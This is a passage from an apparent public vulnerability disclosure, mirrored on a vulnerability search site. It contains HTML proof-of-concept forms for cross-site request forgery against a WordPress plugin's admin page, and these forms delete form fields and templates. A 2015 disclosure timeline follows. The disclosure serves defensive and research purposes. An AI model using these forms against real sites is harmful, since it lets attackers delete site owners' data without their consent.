      <input type="hidden" name="ids[]" value="10" />
      <!-- end list -->
	
      <input type="hidden" name="task" value="delete" />
      <input type="hidden" name="ids[]" value="" />
      <input type="submit" value="delete field(s)" />
    </form>
  </body>
  <!-- 
 	==================================
  	 delete a template  [CSRF PoC #3]
	==================================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
      <input type="hidden" name="filter_state" value="2" />
      <input type="hidden" name="filter_search" value="" />
      <!-- an existing template id(s) to delete -->
      <input type="hidden" name="ids[]" value="1" />    
      <!--end-->
      <input type="hidden" name="task" value="delete" />
      <input type="hidden" name="ids[]" value="" />
      <input type="submit" value="Delete template(s)" />
    </form>
  </body>
<!---
	===========
	 TIME-LINE
	===========
	2015-09-02: vulnerability found
	2015-09-04: Reported to vendor
	2015-09-04: Full disclosure
->

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started